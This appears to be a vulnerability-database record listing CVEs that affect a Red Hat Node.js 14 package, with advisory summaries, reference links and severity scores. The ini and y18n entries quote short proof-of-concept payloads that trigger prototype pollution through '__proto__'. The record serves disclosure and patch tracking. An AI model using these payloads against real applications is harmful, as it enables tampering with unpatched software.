Lookup for vulnerable packages by Package URL.

Purlpkg:rpm/redhat/rh-nodejs14-nodejs@14.15.4-2?arch=el7
Typerpm
Namespaceredhat
Namerh-nodejs14-nodejs
Version14.15.4-2
Qualifiers
arch el7
Subpath
Is_vulnerabletrue
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
0
url VCID-7tyw-ppyt-zqgr
vulnerability_id VCID-7tyw-ppyt-zqgr
summary
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
### Overview
The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.

### Patches

This has been patched in 1.3.6.

### Steps to reproduce

payload.ini
```
[__proto__]
polluted = "polluted"
```

poc.js:
```
var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
```

```
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7788.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7788.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-7788
reference_id
reference_type
scores
0
value 0.00291
scoring_system epss
scoring_elements 0.5253
published_at 2026-04-21T12:55:00Z
1
value 0.00291
scoring_system epss
scoring_elements 0.52398
published_at 2026-04-01T12:55:00Z
2
value 0.00291
scoring_system epss
scoring_elements 0.52444
published_at 2026-04-02T12:55:00Z
3
value 0.00291
scoring_system epss
scoring_elements 0.52471
published_at 2026-04-04T12:55:00Z
4
value 0.00291
scoring_system epss
scoring_elements 0.52437
published_at 2026-04-07T12:55:00Z
5
value 0.00291
scoring_system epss
scoring_elements 0.52489
published_at 2026-04-08T12:55:00Z
6
value 0.00291
scoring_system epss
scoring_elements 0.52484
published_at 2026-04-09T12:55:00Z
7
value 0.00291
scoring_system epss
scoring_elements 0.52535
published_at 2026-04-11T12:55:00Z
8
value 0.00291
scoring_system epss
scoring_elements 0.52518
published_at 2026-04-12T12:55:00Z
9
value 0.00291
scoring_system epss
scoring_elements 0.52502
published_at 2026-04-13T12:55:00Z
10
value 0.00291
scoring_system epss
scoring_elements 0.52541
published_at 2026-04-16T12:55:00Z
11
value 0.00291
scoring_system epss
scoring_elements 0.52546
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-7788
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
3
reference_url https://github.com/npm/ini
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/npm/ini
4
reference_url https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1
5
reference_url https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-7788
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-7788
7
reference_url https://snyk.io/vuln/SNYK-JS-INI-1048974
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-INI-1048974
8
reference_url https://www.npmjs.com/advisories/1589
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/1589
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1907444
reference_id 1907444
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1907444
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=977718
reference_id 977718
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=977718
11
reference_url https://github.com/advisories/GHSA-qqgx-2p2h-9c37
reference_id GHSA-qqgx-2p2h-9c37
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qqgx-2p2h-9c37
12
reference_url https://access.redhat.com/errata/RHSA-2021:0421
reference_id RHSA-2021:0421
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0421
13
reference_url https://access.redhat.com/errata/RHSA-2021:0485
reference_id RHSA-2021:0485
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0485
14
reference_url https://access.redhat.com/errata/RHSA-2021:0521
reference_id RHSA-2021:0521
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0521
15
reference_url https://access.redhat.com/errata/RHSA-2021:0548
reference_id RHSA-2021:0548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0548
16
reference_url https://access.redhat.com/errata/RHSA-2021:0549
reference_id RHSA-2021:0549
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0549
17
reference_url https://access.redhat.com/errata/RHSA-2021:0551
reference_id RHSA-2021:0551
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0551
18
reference_url https://access.redhat.com/errata/RHSA-2021:3280
reference_id RHSA-2021:3280
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3280
19
reference_url https://access.redhat.com/errata/RHSA-2021:3281
reference_id RHSA-2021:3281
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3281
20
reference_url https://access.redhat.com/errata/RHSA-2021:5171
reference_id RHSA-2021:5171
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:5171
21
reference_url https://access.redhat.com/errata/RHSA-2022:0246
reference_id RHSA-2022:0246
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0246
22
reference_url https://access.redhat.com/errata/RHSA-2022:0350
reference_id RHSA-2022:0350
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0350
23
reference_url https://access.redhat.com/errata/RHSA-2022:6595
reference_id RHSA-2022:6595
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:6595
fixed_packages
aliases CVE-2020-7788, GHSA-qqgx-2p2h-9c37
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7tyw-ppyt-zqgr
1
url VCID-fu8u-pxaa-43be
vulnerability_id VCID-fu8u-pxaa-43be
summary
Prototype Pollution in y18n
### Overview

The npm package `y18n` before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution. 

### POC

```js
const y18n = require('y18n')();

y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});

console.log(polluted); // true
```

### Recommendation

Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7774.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7774.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-7774
reference_id
reference_type
scores
0
value 0.00469
scoring_system epss
scoring_elements 0.64567
published_at 2026-04-21T12:55:00Z
1
value 0.00469
scoring_system epss
scoring_elements 0.64564
published_at 2026-04-12T12:55:00Z
2
value 0.00469
scoring_system epss
scoring_elements 0.64581
published_at 2026-04-18T12:55:00Z
3
value 0.00469
scoring_system epss
scoring_elements 0.64569
published_at 2026-04-16T12:55:00Z
4
value 0.00469
scoring_system epss
scoring_elements 0.64536
published_at 2026-04-13T12:55:00Z
5
value 0.00469
scoring_system epss
scoring_elements 0.64455
published_at 2026-04-01T12:55:00Z
6
value 0.00469
scoring_system epss
scoring_elements 0.64509
published_at 2026-04-02T12:55:00Z
7
value 0.00469
scoring_system epss
scoring_elements 0.64538
published_at 2026-04-04T12:55:00Z
8
value 0.00469
scoring_system epss
scoring_elements 0.64496
published_at 2026-04-07T12:55:00Z
9
value 0.00469
scoring_system epss
scoring_elements 0.64545
published_at 2026-04-08T12:55:00Z
10
value 0.00469
scoring_system epss
scoring_elements 0.64561
published_at 2026-04-09T12:55:00Z
11
value 0.00469
scoring_system epss
scoring_elements 0.64576
published_at 2026-04-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-7774
2
reference_url https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7774
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7774
4
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
5
reference_url https://github.com/yargs/y18n
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/yargs/y18n
6
reference_url https://github.com/yargs/y18n/commit/90401eea9062ad498f4f792e3fff8008c4c193a3
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/yargs/y18n/commit/90401eea9062ad498f4f792e3fff8008c4c193a3
7
reference_url https://github.com/yargs/y18n/commit/a9ac604abf756dec9687be3843e2c93bfe581f25
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/yargs/y18n/commit/a9ac604abf756dec9687be3843e2c93bfe581f25
8
reference_url https://github.com/yargs/y18n/issues/96
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/yargs/y18n/issues/96
9
reference_url https://github.com/yargs/y18n/pull/108
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/yargs/y18n/pull/108
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-7774
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-7774
11
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306
12
reference_url https://snyk.io/vuln/SNYK-JS-Y18N-1021887
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-Y18N-1021887
13
reference_url https://www.oracle.com/security-alerts/cpuApr2021.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuApr2021.html
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1898680
reference_id 1898680
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1898680
15
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=976390
reference_id 976390
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=976390
16
reference_url https://github.com/advisories/GHSA-c4w7-xm78-47vh
reference_id GHSA-c4w7-xm78-47vh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c4w7-xm78-47vh
17
reference_url https://security.gentoo.org/glsa/202405-29
reference_id GLSA-202405-29
reference_type
scores
url https://security.gentoo.org/glsa/202405-29
18
reference_url https://access.redhat.com/errata/RHSA-2020:5305
reference_id RHSA-2020:5305
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:5305
19
reference_url https://access.redhat.com/errata/RHSA-2020:5499
reference_id RHSA-2020:5499
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:5499
20
reference_url https://access.redhat.com/errata/RHSA-2020:5633
reference_id RHSA-2020:5633
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:5633
21
reference_url https://access.redhat.com/errata/RHSA-2021:0421
reference_id RHSA-2021:0421
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0421
22
reference_url https://access.redhat.com/errata/RHSA-2021:0521
reference_id RHSA-2021:0521
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0521
23
reference_url https://access.redhat.com/errata/RHSA-2021:0548
reference_id RHSA-2021:0548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0548
24
reference_url https://access.redhat.com/errata/RHSA-2021:0551
reference_id RHSA-2021:0551
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0551
25
reference_url https://access.redhat.com/errata/RHSA-2021:2041
reference_id RHSA-2021:2041
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:2041
26
reference_url https://access.redhat.com/errata/RHSA-2021:2438
reference_id RHSA-2021:2438
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:2438
fixed_packages
aliases CVE-2020-7774, GHSA-c4w7-xm78-47vh
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fu8u-pxaa-43be
2
url VCID-kh5k-ynnf-2bbx
vulnerability_id VCID-kh5k-ynnf-2bbx
summary
Prototype Pollution in Ajv
An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-15366.json
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-15366.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-15366
reference_id
reference_type
scores
0
value 0.00352
scoring_system epss
scoring_elements 0.57641
published_at 2026-04-21T12:55:00Z
1
value 0.00352
scoring_system epss
scoring_elements 0.57667
published_at 2026-04-16T12:55:00Z
2
value 0.00352
scoring_system epss
scoring_elements 0.57637
published_at 2026-04-13T12:55:00Z
3
value 0.00352
scoring_system epss
scoring_elements 0.57657
published_at 2026-04-12T12:55:00Z
4
value 0.00352
scoring_system epss
scoring_elements 0.57678
published_at 2026-04-11T12:55:00Z
5
value 0.00352
scoring_system epss
scoring_elements 0.57663
published_at 2026-04-18T12:55:00Z
6
value 0.00352
scoring_system epss
scoring_elements 0.57606
published_at 2026-04-07T12:55:00Z
7
value 0.00352
scoring_system epss
scoring_elements 0.5763
published_at 2026-04-04T12:55:00Z
8
value 0.00352
scoring_system epss
scoring_elements 0.57609
published_at 2026-04-02T12:55:00Z
9
value 0.00352
scoring_system epss
scoring_elements 0.57659
published_at 2026-04-08T12:55:00Z
10
value 0.00362
scoring_system epss
scoring_elements 0.58193
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-15366
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15366
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15366
3
reference_url https://github.com/ajv-validator/ajv
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ajv-validator/ajv
4
reference_url https://github.com/ajv-validator/ajv/commit/65b2f7d76b190ac63a0d4e9154c712d7aa37049f
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ajv-validator/ajv/commit/65b2f7d76b190ac63a0d4e9154c712d7aa37049f
5
reference_url https://github.com/ajv-validator/ajv/releases/tag/v6.12.3
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ajv-validator/ajv/releases/tag/v6.12.3
6
reference_url https://github.com/ajv-validator/ajv/tags
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ajv-validator/ajv/tags
7
reference_url https://hackerone.com/bugs?subject=user&report_id=894259
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://hackerone.com/bugs?subject=user&report_id=894259
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-15366
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-15366
9
reference_url https://security.netapp.com/advisory/ntap-20240621-0007
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20240621-0007
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1857977
reference_id 1857977
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1857977
11
reference_url https://github.com/advisories/GHSA-v88g-cgmw-v5xw
reference_id GHSA-v88g-cgmw-v5xw
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v88g-cgmw-v5xw
12
reference_url https://access.redhat.com/errata/RHSA-2020:4298
reference_id RHSA-2020:4298
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4298
13
reference_url https://access.redhat.com/errata/RHSA-2020:5305
reference_id RHSA-2020:5305
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:5305
14
reference_url https://access.redhat.com/errata/RHSA-2020:5499
reference_id RHSA-2020:5499
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:5499
15
reference_url https://access.redhat.com/errata/RHSA-2021:0421
reference_id RHSA-2021:0421
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0421
16
reference_url https://access.redhat.com/errata/RHSA-2021:0521
reference_id RHSA-2021:0521
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0521
17
reference_url https://access.redhat.com/errata/RHSA-2021:0548
reference_id RHSA-2021:0548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0548
18
reference_url https://access.redhat.com/errata/RHSA-2021:0551
reference_id RHSA-2021:0551
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0551
19
reference_url https://access.redhat.com/errata/RHSA-2021:0781
reference_id RHSA-2021:0781
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0781
20
reference_url https://access.redhat.com/errata/RHSA-2021:3917
reference_id RHSA-2021:3917
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3917
fixed_packages
aliases CVE-2020-15366, GHSA-v88g-cgmw-v5xw
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kh5k-ynnf-2bbx
3
url VCID-m4sn-7wuq-e3cd
vulnerability_id VCID-m4sn-7wuq-e3cd
summary A Denial of Service vulnerability was discovered in c-ares.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8277.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8277.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8277
reference_id
reference_type
scores
0
value 0.59168
scoring_system epss
scoring_elements 0.98219
published_at 2026-04-01T12:55:00Z
1
value 0.59168
scoring_system epss
scoring_elements 0.9824
published_at 2026-04-18T12:55:00Z
2
value 0.59168
scoring_system epss
scoring_elements 0.98233
published_at 2026-04-13T12:55:00Z
3
value 0.59168
scoring_system epss
scoring_elements 0.98238
published_at 2026-04-21T12:55:00Z
4
value 0.59168
scoring_system epss
scoring_elements 0.98222
published_at 2026-04-02T12:55:00Z
5
value 0.59168
scoring_system epss
scoring_elements 0.98225
published_at 2026-04-04T12:55:00Z
6
value 0.59168
scoring_system epss
scoring_elements 0.98226
published_at 2026-04-07T12:55:00Z
7
value 0.59168
scoring_system epss
scoring_elements 0.9823
published_at 2026-04-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8277
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8277
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8277
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/A7WH7W46OZSEUHWBHD7TCH3LRFY52V6Z/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/A7WH7W46OZSEUHWBHD7TCH3LRFY52V6Z/
5
reference_url https://nodejs.org/en/blog/vulnerability/november-2020-security-releases/
reference_id
reference_type
scores
url https://nodejs.org/en/blog/vulnerability/november-2020-security-releases/
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1898554
reference_id 1898554
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1898554
7
reference_url https://security.archlinux.org/ASA-202011-18
reference_id ASA-202011-18
reference_type
scores
url https://security.archlinux.org/ASA-202011-18
8
reference_url https://security.archlinux.org/AVG-1280
reference_id AVG-1280
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1280
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-8277
reference_id CVE-2020-8277
reference_type
scores
url https://nvd.nist.gov/vuln/detail/CVE-2020-8277
10
reference_url https://security.gentoo.org/glsa/202012-11
reference_id GLSA-202012-11
reference_type
scores
url https://security.gentoo.org/glsa/202012-11
11
reference_url https://access.redhat.com/errata/RHSA-2020:5305
reference_id RHSA-2020:5305
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:5305
12
reference_url https://access.redhat.com/errata/RHSA-2020:5499
reference_id RHSA-2020:5499
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:5499
13
reference_url https://access.redhat.com/errata/RHSA-2021:0421
reference_id RHSA-2021:0421
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0421
14
reference_url https://access.redhat.com/errata/RHSA-2021:0551
reference_id RHSA-2021:0551
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0551
15
reference_url https://usn.ubuntu.com/4638-1/
reference_id USN-4638-1
reference_type
scores
url https://usn.ubuntu.com/4638-1/
fixed_packages
aliases CVE-2020-8277
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-m4sn-7wuq-e3cd
4
url VCID-v5h1-gpt1-97bj
vulnerability_id VCID-v5h1-gpt1-97bj
summary
Regular expression denial of service in npm-user-validate
This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7754.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7754.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-7754
reference_id
reference_type
scores
0
value 0.0163
scoring_system epss
scoring_elements 0.81918
published_at 2026-04-21T12:55:00Z
1
value 0.0163
scoring_system epss
scoring_elements 0.81814
published_at 2026-04-01T12:55:00Z
2
value 0.0163
scoring_system epss
scoring_elements 0.81824
published_at 2026-04-02T12:55:00Z
3
value 0.0163
scoring_system epss
scoring_elements 0.81847
published_at 2026-04-04T12:55:00Z
4
value 0.0163
scoring_system epss
scoring_elements 0.81844
published_at 2026-04-07T12:55:00Z
5
value 0.0163
scoring_system epss
scoring_elements 0.8187
published_at 2026-04-08T12:55:00Z
6
value 0.0163
scoring_system epss
scoring_elements 0.81877
published_at 2026-04-09T12:55:00Z
7
value 0.0163
scoring_system epss
scoring_elements 0.81897
published_at 2026-04-11T12:55:00Z
8
value 0.0163
scoring_system epss
scoring_elements 0.81885
published_at 2026-04-12T12:55:00Z
9
value 0.0163
scoring_system epss
scoring_elements 0.8188
published_at 2026-04-13T12:55:00Z
10
value 0.0163
scoring_system epss
scoring_elements 0.81916
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-7754
2
reference_url https://github.com/npm/npm-user-validate/commit/c8a87dac1a4cc6988b5418f30411a8669bef204e
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/npm/npm-user-validate/commit/c8a87dac1a4cc6988b5418f30411a8669bef204e
3
reference_url https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-7754
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-7754
5
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1019353
reference_id
